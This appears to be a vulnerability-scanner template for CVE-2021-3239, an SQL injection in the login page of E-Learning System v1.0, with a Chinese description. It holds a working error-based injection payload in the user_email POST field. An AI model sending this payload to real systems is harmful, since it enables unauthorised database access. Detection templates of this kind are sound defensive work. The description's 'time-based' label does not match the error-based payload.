漏洞描述
user_email 参数似乎容易受到基于时间的盲注的 SQL 注入攻击。 在 user_email 参数中提交了单引号,并返回了一般错误消息。 然后提交了两个单引号,错误信息就消失了。
id: CVE-2021-3239
info:
name: E-Learning System v1.0 SQL注入基于时间盲注漏洞
author: nu11secur1ty
severity: critical
description: user_email 参数似乎容易受到基于时间的盲注的 SQL 注入攻击。 在 user_email 参数中提交了单引号,并返回了一般错误消息。 然后提交了两个单引号,错误信息就消失了。
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101821
set:
hosturl: request.url
rules:
r0:
request:
method: POST
path: /admin/login.php
headers:
Origin: "{{hosturl}}"
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Referer: "{{hosturl}}/admin/login.php"
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
body: |
user_email=QXVzAYzI@nu11secur1tycollaborator.net#'||(SELECT 0x57745147 WHERE 1914=1914 AND (SELECT 7338 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(7338=7338,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&user_pass=u0U!y2z!D9&btnLogin=%C2%9E%C3%A9e
expression: response.status == 200 && response.body.bcontains(b'mysqli_query():')
expression: r0()